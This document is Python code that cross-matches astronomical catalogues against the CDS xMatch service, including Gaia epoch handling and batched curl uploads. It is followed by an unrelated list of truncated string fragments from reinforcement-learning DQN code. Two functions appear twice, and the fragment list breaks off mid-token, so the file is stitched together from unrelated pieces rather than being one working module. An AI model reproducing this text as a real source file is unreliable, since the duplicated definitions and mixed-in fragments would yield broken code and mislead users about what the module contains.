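# For reference, the subprocess call above is equivalent to running the
# following from the directory containing the positions file (shown with
# the defaults maxdist=2, selection='best', and a hypothetical 'pos.csv'):
#
#   curl -X POST -F request=xmatch -F distMaxArcsec=2 -F selection=best \
#        -F RESPONSEFORMAT=csv -F cat1=@pos.csv -F colRA1=RA -F colDec1=DEC \
#        -F cat2=vizier:I/350/gaiaedr3 \
#        http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync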
def cds_load(filename):
    if WIN32:
        # Windows does not have float128, under which source_id (a 64-bit
        # integer) would be read exactly; get around this by reading
        # everything as float64 first and then storing source_id as an
        # unsigned 64-bit integer column, which keeps its full precision
        # since source_id is always an integer
        # Only read the first row here, to cheaply get the column names
        data= numpy.genfromtxt(filename,delimiter=',',skip_header=0,
                               filling_values=-9999.99,names=True,
                               max_rows=1,dtype='float64')
        to_list= list(data.dtype.names)
        # Construct a dtype where everything is float64 except source_id
        dtype_list= [('{}'.format(i),numpy.float64) for i in to_list]
        dtype_list[dtype_list.index(('source_id',numpy.float64))]= \
            ('source_id',numpy.uint64)
        return numpy.genfromtxt(filename,delimiter=',',skip_header=0,
                                filling_values=-9999.99,names=True,
                                dtype=dtype_list)
    else:
        return numpy.genfromtxt(filename,delimiter=',',skip_header=0,
                                filling_values=-9999.99,names=True,
                                dtype='float128')
def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best',
                  epoch=None,colpmRA='pmra',colpmDec='pmdec'):
    """
    NAME:
       cds_matchback
    PURPOSE:
       Match a matched catalog from xmatch.cds back to the original catalog
    INPUT:
       cat - original catalog
       xcat - matched catalog returned by xmatch.cds
       colRA= ('RA') name of the tag in cat with the right ascension
       colDec= ('DEC') name of the tag in cat with the declination
       selection= ('best') select either all matches or the best match according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html)
       epoch= (2000.) epoch of the coordinates in cat
       colpmRA= ('pmra') name of the tag in cat with the proper motion in right ascension in degree in cat (assumed to be ICRS; includes cos(Dec)) [only used when epoch != 2000.]
       colpmDec= ('pmdec') name of the tag in cat with the proper motion in declination in degree in cat (assumed to be ICRS) [only used when epoch != 2000.]
    OUTPUT:
       Array of indices into cat of xcat entries: index[0] is the cat index of xcat[0]
    HISTORY:
       2016-09-12 - Written - Bovy (UofT)
       2018-05-04 - Account for non-zero epoch difference - Bovy (UofT)
    """
    if selection != 'all': selection= 'best'
    if selection == 'all':
        raise NotImplementedError("selection='all' CDS cross-match not currently implemented")
    if epoch is None:
        if 'ref_epoch' in cat.dtype.fields:
            epoch= cat['ref_epoch']
        else:
            epoch= 2000.
    _check_epoch(cat,epoch)
    depoch= epoch-2000.
    if numpy.any(depoch != 0.):
        # Use proper motion to get both catalogs at the same time
        dra= cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\
            /3600000.*depoch
        ddec= cat[colpmDec]/3600000.*depoch
        # Don't shift objects with non-existing proper motion
        dra[numpy.isnan(cat[colpmRA])]= 0.
        ddec[numpy.isnan(cat[colpmDec])]= 0.
    else:
        dra= numpy.zeros(len(cat))
        ddec= numpy.zeros(len(cat))
    # Cross-match to a very small separation, because the match here is
    # against the *original* coordinates, not the matched coordinates in CDS
    mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec,
                          unit=(u.degree, u.degree),frame='icrs')
    mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'],
                          unit=(u.degree, u.degree),frame='icrs')
    idx,d2d,d3d= mc2.match_to_catalog_sky(mc1)
    mindx= d2d < 1e-5*u.arcsec
    return idx[mindx]
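# A sketch of matching a saved CDS result back to the original catalog
# ('my_cat' and 'cds_result.csv' are the hypothetical names used above):
#
#   ma= cds_load('cds_result.csv')
#   indices= cds_matchback(my_cat,ma)
#   # my_cat[indices[i]] is the original source corresponding to ma[i]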
def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC',
        selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec',
        savefilename=None,gaia_all_columns=False):
    """
    NAME:
       cds
    PURPOSE:
       Cross-match against a catalog in the CDS archive using the CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the curl interface
    INPUT:
       cat - a catalog to cross-match, requires 'RA' and 'DEC' keywords (see below)
       xcat= ('vizier:I/350/gaiaedr3') name of the catalog to cross-match against, in a format understood by the CDS cross-matching service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2' or 'vizier:I/345/gaia2')
       maxdist= (2) maximum distance in arcsec
       colRA= ('RA') name of the tag in cat with the right ascension
       colDec= ('DEC') name of the tag in cat with the declination
       selection= ('best') select either all matches or the best match according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html)
       epoch= (2000.) epoch of the coordinates in cat
       colpmRA= ('pmra') name of the tag in cat with the proper motion in right ascension in degree in cat (assumed to be ICRS; includes cos(Dec)) [only used when epoch != 2000.]
       colpmDec= ('pmdec') name of the tag in cat with the proper motion in declination in degree in cat (assumed to be ICRS) [only used when epoch != 2000.]
       gaia_all_columns= (False) set to True if you are matching against Gaia DR2 and want *all* columns returned; this runs a query at the Gaia Archive, which may or may not work...
       savefilename= (None) if set, save the output from CDS to this path; can match back using cds_matchback
    OUTPUT:
       (xcat entries for those that match,
        indices into cat of matching sources: index[0] is cat index of xcat[0])
    HISTORY:
       2016-09-12 - Written based on RC catalog code - Bovy (UofT)
       2018-05-04 - Account for non-zero epoch difference - Bovy (UofT)
       2018-05-08 - Added gaia_all_columns - Bovy (UofT)
    """
    if epoch is None:
        if 'ref_epoch' in cat.dtype.fields:
            epoch= cat['ref_epoch']
        else:
            epoch= 2000.
    _check_epoch(cat,epoch)
    depoch= epoch-2000.
    if numpy.any(depoch != 0.):
        # Use proper motion to get both catalogs at the same time
        dra= cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\
            /3600000.*depoch
        ddec= cat[colpmDec]/3600000.*depoch
        # Don't shift objects with non-existing proper motion
        dra[numpy.isnan(cat[colpmRA])]= 0.
        ddec[numpy.isnan(cat[colpmDec])]= 0.
    else:
        dra= numpy.zeros(len(cat))
        ddec= numpy.zeros(len(cat))
    if selection != 'all': selection= 'best'
    if selection == 'all':
        raise NotImplementedError("selection='all' CDS cross-match not currently implemented")
    # Write positions
    posfilename= tempfile.mktemp('.csv',dir=os.getcwd())
    resultfilename= tempfile.mktemp('.csv',dir=os.getcwd())
    with open(posfilename,'w') as csvfile:
        wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL)
        wr.writerow(['RA','DEC'])
        for ii in range(len(cat)):
            wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360.,
                         cat[ii][colDec]-ddec[ii]])
    _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat)
    # Directly match on input RA
    ma= cds_load(resultfilename)
    if gaia_all_columns:
        from astroquery.gaia import Gaia
        # Write another temporary file with the XML output of the cross-match
        tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T,
                   names=('source_id','RA','DEC'),
                   dtype=('int64','float64','float64'))
        xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd())
        tab.write(xmlfilename,format='votable')
        # get the data release....
        table_identifier = xcat.split('/')[-1]
        if table_identifier == 'gaia2':
            table_identifier = 'gaiadr2'
        try:
            job= Gaia.launch_job_async(
                """select g.*, m.RA as mRA, m.DEC as mDEC
from %s.gaia_source as g
inner join tap_upload.my_table as m on m.source_id = g.source_id"""
                % table_identifier,
                upload_resource=xmlfilename,
                upload_table_name="my_table")
            ma= job.get_results()
        except Exception:
            print("gaia_tools.xmatch.cds failed to retrieve all gaia columns, returning just the default returned by the CDS xMatch instead...")
        else:
            ma.rename_column('mra','RA')
            ma.rename_column('mdec','DEC')
        finally:
            os.remove(xmlfilename)
    # Remove temporary files
    os.remove(posfilename)
    if savefilename is None:
        os.remove(resultfilename)
    else:
        shutil.move(resultfilename,savefilename)
    # Match back to the original catalog
    mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch,
                       colpmRA=colpmRA,colpmDec=colpmDec)
    return (ma,mai)
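
# Illustrative usage sketch for cds (hypothetical catalog `cat` with 'RA' and
# 'DEC' columns); the keyword values shown are the defaults:
#
#     ma, mai = cds(cat, xcat='vizier:I/350/gaiaedr3', maxdist=2)
#     gaia_rows = ma        # xMatch output rows for the matched sources
#     cat_rows = cat[mai]   # the same sources in the original catalog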
def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat,
                       nruns_necessary=1):
    """CDS xMatch (sometimes?) fails for large matches because of a time-out,
    so we recursively split until the batches are small enough to not fail"""
    # Figure out which part of the hierarchy we are running
    try:
        runs= ''.join([str(int(r)-1)
                       for r in posfilename.split('csv.')[-1].split('.')])
    except ValueError:
        runs= ''
    nruns= 2**len(runs)
    if nruns >= nruns_necessary:
        # Only run this level's match if we don't already know that we
        # should be using smaller batches
        _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat)
        try:
            ma= cds_load(resultfilename)
        except ValueError: # Assume this is the time-out failure
            pass
        else:
            return nruns
    # xMatch failed because of time-out, split
    posfilename1= posfilename+'.1'
    posfilename2= posfilename+'.2'
    resultfilename1= resultfilename+'.1'
    resultfilename2= resultfilename+'.2'
    # Figure out which part of the hierarchy we are running
    runs= ''.join([str(int(r)-1)
                   for r in posfilename1.split('csv.')[-1].split('.')])
    nruns= 2**len(runs)
    thisrun1= 1+int(runs,2)
    thisrun2= 1+int(''.join([str(int(r)-1)
                             for r in posfilename2.split('csv.')[-1].split('.')]),2)
    # Count the number of objects
    with open(posfilename,'r') as posfile:
        num_lines= sum(1 for line in posfile)
    # Write the header line
    with open(posfilename1,'w') as posfile1:
        with open(posfilename,'r') as posfile:
            posfile1.write(posfile.readline())
    with open(posfilename2,'w') as posfile2:
        with open(posfilename,'r') as posfile:
            posfile2.write(posfile.readline())
    # Cut in half
    cnt= 0
    with open(posfilename,'r') as posfile:
        with open(posfilename1,'a') as posfile1:
            with open(posfilename2,'a') as posfile2:
                for line in posfile:
                    if cnt == 0:
                        cnt+= 1
                        continue
                    if cnt < num_lines//2:
                        posfile1.write(line)
                        cnt+= 1 # Can stop counting once this if is done
                    else:
                        posfile2.write(line)
    # Run each
    sys.stdout.write('\r'+"Working on CDS xMatch batch {} / {} ...\r"\
                     .format(thisrun1,nruns))
    sys.stdout.flush()
    nruns_necessary= _cds_match_batched(resultfilename1,posfilename1,
                                        maxdist,selection,xcat,
                                        nruns_necessary=nruns_necessary)
    sys.stdout.write('\r'+"Working on CDS xMatch batch {} / {} ...\r"\
                     .format(thisrun2,nruns))
    sys.stdout.flush()
    nruns_necessary= _cds_match_batched(resultfilename2,posfilename2,
                                        maxdist,selection,xcat,
                                        nruns_necessary=nruns_necessary)
    sys.stdout.write('\r'+_ERASESTR+'\r')
    sys.stdout.flush()
    # Combine results
    with open(resultfilename,'w') as resultfile:
        with open(resultfilename1,'r') as resultfile1:
            for line in resultfile1:
                resultfile.write(line)
        with open(resultfilename2,'r') as resultfile2:
            for line in resultfile2:
                # Skip the second batch's duplicated header line
                if line[0] == 'a': continue
                resultfile.write(line)
    # Remove intermediate files
    os.remove(posfilename1)
    os.remove(posfilename2)
    os.remove(resultfilename1)
    os.remove(resultfilename2)
    return nruns_necessary
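
# Worked example of the batch bookkeeping above (illustrative): for a split
# file named 'pos.csv.1.2', the suffixes after 'csv.' are ['1', '2'], so
# runs = '01' (each digit minus one), nruns = 2**2 = 4 leaves at this depth,
# and thisrun = 1 + int('01', 2) = 2, i.e. this is batch 2 of 4.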
def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat):
    # Send to CDS for matching
    result= open(resultfilename,'w')
    try:
        subprocess.check_call(['curl',
                               '-X','POST',
                               '-F','request=xmatch',
                               '-F','distMaxArcsec=%i' % maxdist,
                               '-F','selection=%s' % selection,
                               '-F','RESPONSEFORMAT=csv',
                               '-F','cat1=@%s' % os.path.basename(posfilename),
                               '-F','colRA1=RA',
                               '-F','colDec1=DEC',
                               '-F','cat2=%s' % xcat,
                               'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'],
                              stdout=result)
    except subprocess.CalledProcessError:
        os.remove(posfilename)
        if os.path.exists(resultfilename):
            result.close()
            os.remove(resultfilename)
    result.close()
    return None
def cds_load(filename):
    if WIN32:
        # Windows does not have float128, but source_id needs more precision
        # than float64 offers; get around this by storing source_id as an
        # integer column, which is fine because source_id is always an
        # integer anyway.
        # Only read the first row here, to cheaply get the column names:
        data = numpy.genfromtxt(filename, delimiter=',', skip_header=0,
                                filling_values=-9999.99, names=True,
                                max_rows=1, dtype='float64')
        to_list = list(data.dtype.names)
        # Construct a dtype where everything is fp64 except 'source_id',
        # which becomes uint64 to keep its full precision
        dtype_list = [('{}'.format(i), numpy.float64) for i in to_list]
        dtype_list[dtype_list.index(('source_id', numpy.float64))] \
            = ('source_id', numpy.uint64)
        return numpy.genfromtxt(filename, delimiter=',', skip_header=0,
                                filling_values=-9999.99, names=True,
                                dtype=dtype_list)
    else:
        return numpy.genfromtxt(filename, delimiter=',', skip_header=0,
                                filling_values=-9999.99, names=True,
                                dtype='float128')
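
# Illustrative round-trip of cds_load (hypothetical file name): the CSV
# written by the xMatch service is read back with numpy.genfromtxt, e.g.
#
#     ma = cds_load('xmatch_result.csv')
#     ma['source_id']  # integer Gaia source ids, full precision on any OS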
def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best',
                  epoch=None,colpmRA='pmra',colpmDec='pmdec'):
    """
    NAME:
       cds_matchback
    PURPOSE:
       Match a matched catalog from xmatch.cds back to the original catalog
    INPUT:
       cat - original catalog
       xcat - matched catalog returned by xmatch.cds
       colRA= ('RA') name of the tag in cat with the right ascension
       colDec= ('DEC') name of the tag in cat with the declination
       selection= ('best') select either all matches or the best match according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html)
       epoch= (2000.) epoch of the coordinates in cat
       colpmRA= ('pmra') name of the tag in cat with the proper motion in right ascension in degree in cat (assumed to be ICRS; includes cos(Dec)) [only used when epoch != 2000.]
       colpmDec= ('pmdec') name of the tag in cat with the proper motion in declination in degree in cat (assumed to be ICRS) [only used when epoch != 2000.]
    OUTPUT:
       Array indices into cat of xcat entries: index[0] is cat index of xcat[0]
    HISTORY:
       2016-09-12 - Written - Bovy (UofT)
       2018-05-04 - Account for non-zero epoch difference - Bovy (UofT)
    """
    if selection != 'all': selection= 'best'
    if selection == 'all':
        raise NotImplementedError("selection='all' CDS cross-match not currently implemented")
    if epoch is None:
        if 'ref_epoch' in cat.dtype.fields:
            epoch= cat['ref_epoch']
        else:
            epoch= 2000.
    _check_epoch(cat,epoch)
    depoch= epoch-2000.
    if numpy.any(depoch != 0.):
        # Use proper motion to get both catalogs at the same time
        dra= cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\
            /3600000.*depoch
        ddec= cat[colpmDec]/3600000.*depoch
        # Don't shift objects with non-existing proper motion
        dra[numpy.isnan(cat[colpmRA])]= 0.
        ddec[numpy.isnan(cat[colpmDec])]= 0.
    else:
        dra= numpy.zeros(len(cat))
        ddec= numpy.zeros(len(cat))
    # xmatch to a v. small difference, because the match is against the
    # *original* coords, not the matched coords in CDS
    mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec,
                          unit=(u.degree, u.degree),frame='icrs')
    mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'],
                          unit=(u.degree, u.degree),frame='icrs')
    idx,d2d,d3d = mc2.match_to_catalog_sky(mc1)
    mindx= d2d < 1e-5*u.arcsec
    return idx[mindx]
def _check_epoch(cat,epoch):
    warn_about_epoch= False
    if 'ref_epoch' in cat.dtype.fields:
        if 'designation' not in cat.dtype.fields: # Assume this is DR1
            if numpy.any(numpy.fabs(epoch-2015.) > 0.01):
                warn_about_epoch= True
        elif 'Gaia DR2' in cat['designation'][0].decode('utf-8'):
            if numpy.any(numpy.fabs(epoch-2015.5) > 0.01):
                warn_about_epoch= True
    if warn_about_epoch:
        warnings.warn("You appear to be using a Gaia catalog, but are not setting the epoch to 2015. (DR1) or 2015.5 (DR2), which may lead to incorrect matches")
    return None
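
# Illustrative example of the epoch warning above (hypothetical DR2-like
# record array):
#
#     gcat = numpy.zeros(1, dtype=[('ra', 'f8'), ('ref_epoch', 'f8'),
#                                  ('designation', 'S30')])
#     gcat['designation'] = b'Gaia DR2 12345'
#     _check_epoch(gcat, 2000.)   # warns: epoch should be 2015.5 for DR2
#     _check_epoch(gcat, 2015.5)  # silent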
[ "ray.rllib.utils.error import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import ParameterNoise from ray.rllib.utils.framework import", "add LayerNorm after each Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm)", "support_logits_per_action, logits, probs_or_logits) = model.get_q_value_distributions(model_out) else: (action_scores, logits, probs_or_logits) =", "if config[\"hiddens\"]: # try to infer the last layer size,", "optimizer: \"torch.optim.Optimizer\", loss: TensorType) -> Dict[str, TensorType]: # Clip grads", "from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import", "floor_equal_ceil) mu_delta = q_probs_tp1_best * (b - lb) ml_delta =", "= torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best = torch.sum(", "- 1)) lb = torch.floor(b) ub = torch.ceil(b) # Indispensable", "type, List[TensorType]]: q_vals = compute_q_values(policy, model, obs_batch, explore, is_training) q_vals", "TensorType]: return {\"q_values\": policy.q_values} DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda:", "for dist dqn \"mean_td_error\": torch.mean(self.td_error), } else: q_tp1_best_masked = (1.0", "0) r_tau = torch.clamp(r_tau, v_min, v_max) b = (r_tau -", "= action_space.n # TODO(sven): Move option to add LayerNorm after", "import SampleBatch from ray.rllib.policy.torch_policy import LearningRateSchedule from ray.rllib.policy.torch_policy_template import build_torch_policy", "policy.q_values = q_vals return policy.q_values, TorchCategorical, [] # state-out def", "policy.q_values, TorchCategorical, [] # state-out def build_q_losses(policy: Policy, model, _,", "\"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel,", "torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered = ( support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean,", "+ advantages_centered else: value = action_scores return value, logits, probs_or_logits", "= try_import_torch() F = None if nn: F = nn.functional", "False, **kwargs) -> Tuple[TensorType, type, List[TensorType]]: q_vals = compute_q_values(policy, model,", "(action_scores, z, support_logits_per_action, logits, probs_or_logits) = model.get_q_value_distributions(model_out) else: (action_scores, logits,", "< 0.5).float() # (batch_size, num_atoms, num_atoms) l_project = F.one_hot(lb.long(), num_atoms)", "# generically into ModelCatalog. 
add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables() policy.target_q_model =", "q_tp1_best, q_probs_tp1_best, importance_weights, rewards, done_mask, gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0):", "to `prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss = torch.mean(self.td_error", "name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven):", "1.0 - done_mask, -1) * torch.unsqueeze(z, 0) r_tau = torch.clamp(r_tau,", "Tuple[TensorType, type, List[TensorType]]: q_vals = compute_q_values(policy, model, obs_batch, explore, is_training)", "torch.unsqueeze( 1.0 - done_mask, -1) * torch.unsqueeze(z, 0) r_tau =", "obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]: if", "action_space.n # TODO(sven): Move option to add LayerNorm after each", "(ub - b + floor_equal_ceil) mu_delta = q_probs_tp1_best * (b", "for # priority is robust and insensitive to `prioritized_replay_alpha` self.td_error", "were selected in the given state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n)", "TensorType, explore, is_training: bool = False): config = policy.config model_out,", "**policy.q_loss.stats) def setup_early_mixins(policy: Policy, obs_space, action_space, config: TrainerConfigDict) -> None:", "dqn \"mean_td_error\": torch.mean(self.td_error), } else: q_tp1_best_masked = (1.0 - done_mask)", "config: TrainerConfigDict) -> \"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def", "logits, probs_or_logits) = model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score = model.get_state_value(model_out) if", "done_mask, -1) * torch.unsqueeze(z, 0) r_tau = torch.clamp(r_tau, v_min, v_max)", "q_dist_tp1_using_online_net = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net =", "def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask, importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS:", "= F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 >", "import Policy from ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.policy.torch_policy import LearningRateSchedule", "Dense # generically into ModelCatalog. 
add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables() policy.target_q_model", "config[\"v_max\"]) return policy.q_loss.loss def adam_optimizer(policy: Policy, config: TrainerConfigDict) -> \"torch.optim.Optimizer\":", "build_q_losses(policy: Policy, model, _, train_batch: SampleBatch) -> TensorType: config =", "# compute RHS of bellman equation q_t_selected_target = rewards +", "act_t, rew_t, obs_tp1, done_mask, importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS]", "Policy from ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.policy.torch_policy import LearningRateSchedule from", "TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy: Policy, obs_space:", "num_atoms - 1, dtype=torch.float32) z = v_min + z *", "F.one_hot(lb.long(), num_atoms) # (batch_size, num_atoms, num_atoms) u_project = F.one_hot(ub.long(), num_atoms)", "Policy, model: ModelV2, obs_batch: TensorType, *, explore: bool = True,", "List, Tuple import gym import ray from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping", "else: q_tp1_best_masked = (1.0 - done_mask) * q_tp1_best # compute", "if not isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action space {} is", "policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean = torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered =", "(ub - lb < 0.5).float() # (batch_size, num_atoms, num_atoms) l_project", "{ \"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), }", "1) q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else:", "# Indispensable judgement which is missed in most implementations #", "config[\"lr_schedule\"]) def after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict)", "Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin", "= torch.unsqueeze( rewards, -1) + gamma**n_step * torch.unsqueeze( 1.0 -", "num_outputs = ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True else: num_outputs", "from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from ray.rllib.models.catalog", "configured. 
return apply_grad_clipping(policy, optimizer, loss) def extra_action_out_fn(policy: Policy, input_dict, state_batches,", "q_t_selected - q_t_selected_target.detach() self.loss = torch.mean( importance_weights.float() * huber_loss(self.td_error)) self.stats", "device=policy.device)) * one_hot_selection, 1) q_logits_t_selected = torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection,", "return dict({ \"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats) def setup_early_mixins(policy: Policy, obs_space,", "model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"],", "compute_q_values(policy, model, obs_batch, explore, is_training) q_vals = q_vals[0] if isinstance(q_vals,", "advantages_centered = action_scores - torch.unsqueeze( advantages_mean, 1) value = state_score", "gym.Space, config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]: if not isinstance(action_space, gym.spaces.Discrete):", "torch.mean( importance_weights.float() * huber_loss(self.td_error)) self.stats = { \"mean_q\": torch.mean(q_t_selected), \"min_q\":", "= torch.clamp(r_tau, v_min, v_max) b = (r_tau - v_min) /", "m = ml_delta + mu_delta # Rainbow paper claims that", "obs_batch, explore, is_training) q_vals = q_vals[0] if isinstance(q_vals, tuple) else", "importance_weights, rewards, done_mask, gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0): if num_atoms", "logits=q_logits_t_selected, labels=m) self.loss = torch.mean(self.td_error * importance_weights) self.stats = {", "F = None if nn: F = nn.functional class QLoss:", "input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS] = rew_t", "model, action_dist) -> Dict[str, TensorType]: return {\"q_values\": policy.q_values} DQNTorchPolicy =", "nn.functional.softmax( support_logits_per_action) value = torch.sum(z * support_prob_per_action, dim=-1) logits =", "- torch.unsqueeze( advantages_mean, 1) value = state_score + advantages_centered else:", "= ( isinstance(getattr(policy, \"exploration\", None), ParameterNoise) or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\")", "/ float(num_atoms - 1)) lb = torch.floor(b) ub = torch.ceil(b)", "ub, so pr_j(s', a*) will # be discarded because (ub-b)", "ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE,", "in the given state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected =", "add LayerNorm after each Dense # generically into ModelCatalog. 
add_layer_norm", "-1), 1) # compute estimate of best possible value starting", "policy.target_q_model = policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy, model: ModelV2, obs: TensorType,", "missed in most implementations # when b happens to be", "* torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss = QLoss( q_t_selected, q_logits_t_selected, q_tp1_best,", "config: TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space, config) #", "value = torch.sum(z * support_prob_per_action, dim=-1) logits = support_logits_per_action probs_or_logits", "input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS] = importance_weights # Do forward pass", "torch.ceil(b) # Indispensable judgement which is missed in most implementations", "importance_weights.float() * huber_loss(self.td_error)) self.stats = { \"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected),", "q_tp1_best_one_hot_selection, 1) q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1)", "q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1", "gamma**n_step * torch.unsqueeze( 1.0 - done_mask, -1) * torch.unsqueeze(z, 0)", "( support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action = torch.unsqueeze( state_score,", "input_dict[PRIO_WEIGHTS] = importance_weights # Do forward pass on loss to", "train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) # Target Q-network evaluation. q_tp1, q_logits_tp1, q_probs_tp1", "q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"])", "an entropy loss z = torch.range(0.0, num_atoms - 1, dtype=torch.float32)", "policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE,", "ModelCatalog. 
